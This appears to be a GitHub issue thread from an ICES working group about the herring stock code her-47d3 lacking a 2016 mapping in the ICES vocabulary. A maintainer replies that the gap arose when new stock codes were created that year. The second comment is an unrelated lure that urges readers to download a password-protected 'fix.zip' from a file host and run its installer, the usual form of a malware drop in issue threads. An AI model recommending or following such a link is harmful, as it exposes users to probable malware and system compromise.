### ISSUE TITLE
The stock code her-47d3 not related to the year 2016 even though it's used in many biological records in many cruises/surveys

### ISSUE THREAD

**Issue by HjalteParner** [ices-eg/wg_WGAcousticGov#63]

**Comment by HjalteParner** [comment]
@Ihtsham is currently running the consistency checks on all data within the acoustic database. The new stock code / year check raises a lot of the same error for her-47d3 in 2016 which isn't currently mapped in the vocabulary https://vocab.ices.dk/?codeguid=5281f73c-22cb-4049-a704-85717934f1cd. Only 2013, 2014 and 2015 is currently mapped.

@odontaster will you please check if this is a mistake that her-47d3 isn't mapped to 2016 in our vocabulary, or if all submitters in question are using this stock code mistakenly?

Thanks

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by odontaster** [comment]
Hey @HjalteParner , I can see that no many stocks are linked to Year 2016, I will bring this to RMG. That was the year when new stock codes where created so looks like there was a bit of a gap in there. My first answer is that we can accept the old code (so I will link it), but let me go to RMG first.
